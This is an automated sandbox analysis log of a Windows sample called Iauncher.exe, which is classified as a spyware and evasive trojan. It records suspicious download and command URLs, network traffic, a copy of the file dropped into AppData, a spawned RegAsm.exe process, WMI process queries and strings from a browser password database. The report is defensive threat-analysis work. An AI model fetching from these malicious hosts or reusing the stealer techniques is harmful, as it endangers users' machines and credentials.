Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/hwid.txt
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/hwid.txtd
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/z-Closing.txt
Source: Iauncher.exe, Iauncher.exe, 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1978480941.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Iauncher.exe	String found in binary or memory: https://communitykeyv1.000webhostapp.com/Decoder4.php?string=
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gitgo.org
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gitgo.org/Iauncher.zip
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gitgo.org/Iauncher.zipd
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/516730/what-does-the-visual-studio-any-cpu-target-mean&
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.siticoneframework.com/
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.siticoneframework.com/pricing.htmlFSoftware

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.179:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp50E6.tmp			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp50A6.tmp			Jump to dropped file

Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_04E0A080	0_2_04E0A080
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_04E0BDD0	0_2_04E0BDD0
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_04E0048C	0_2_04E0048C
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_04E0A070	0_2_04E0A070
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_04E023E8	0_2_04E023E8
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_04E023F8	0_2_04E023F8
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_04E023A0	0_2_04E023A0
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_04E0B640	0_2_04E0B640
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_04E0B650	0_2_04E0B650
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_05CBA520	0_2_05CBA520
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_05CBAC28	0_2_05CBAC28
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_0744F531	0_2_0744F531
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_07927770	0_2_07927770
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_0792776E	0_2_0792776E
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_09F153C4	0_2_09F153C4
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_09F15490	0_2_09F15490
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_09F1A8A1	0_2_09F1A8A1
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_09F113F0	0_2_09F113F0
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_09F1344C	0_2_09F1344C
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_09F11400	0_2_09F11400
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_05CC009F	0_2_05CC009F
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F1FBC0	2_2_00F1FBC0
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F23CF3	2_2_00F23CF3
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F2D4F1	2_2_00F2D4F1
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F2BC73	2_2_00F2BC73
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F1CC44	2_2_00F1CC44
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F24713	2_2_00F24713
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00BCDC74	4_2_00BCDC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_04D36948	4_2_04D36948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_04D37C20	4_2_04D37C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_04D30040	4_2_04D30040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_04D3003C	4_2_04D3003C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_04D37C10	4_2_04D37C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_04D35A45	4_2_04D35A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_060467D8	4_2_060467D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0604A3E8	4_2_0604A3E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06043F50	4_2_06043F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0604A3D8	4_2_0604A3D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06046FE8	4_2_06046FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06046FF8	4_2_06046FF8

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

Code function: String function: 00F16FC0 appears 49 times

Source: Iauncher.exe, 00000000.00000002.3515292527.00000000051C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
Source: Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
Source: Iauncher.exe, 00000000.00000002.3508288083.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Iauncher.exe
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
Source: Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
Source: Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
Source: Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
Source: Iauncher.exe	Binary or memory string: OriginalFilename vs Iauncher.exe
Source: Iauncher.exe, 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenameMurkish.exe8 vs Iauncher.exe
Source: Iauncher.exe	Binary or memory string: OriginalFilenameGitgo.exe" vs Iauncher.exe

Source: Iauncher.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: Iauncher.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Iauncher.exe.0.dr

Static PE information: Section: .bsS ZLIB complexity 0.9981044138707038

Source: classification engine

Classification label: mal96.troj.spyw.evad.winEXE@6/7@3/4

Source: C:\Users\user\Desktop\Iauncher.exe

File created: C:\Users\user\AppData\Roaming\Iauncher.zip

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\Tmp50A6.tmp

Jump to behavior

Source: Iauncher.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Iauncher.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Users\user\Desktop\Iauncher.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Iauncher.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Iauncher.exe

ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Users\user\Desktop\Iauncher.exe "C:\Users\user\Desktop\Iauncher.exe"
Source: C:\Users\user\Desktop\Iauncher.exe	Process created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe"
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Iauncher.exe	Process created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\Iauncher.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
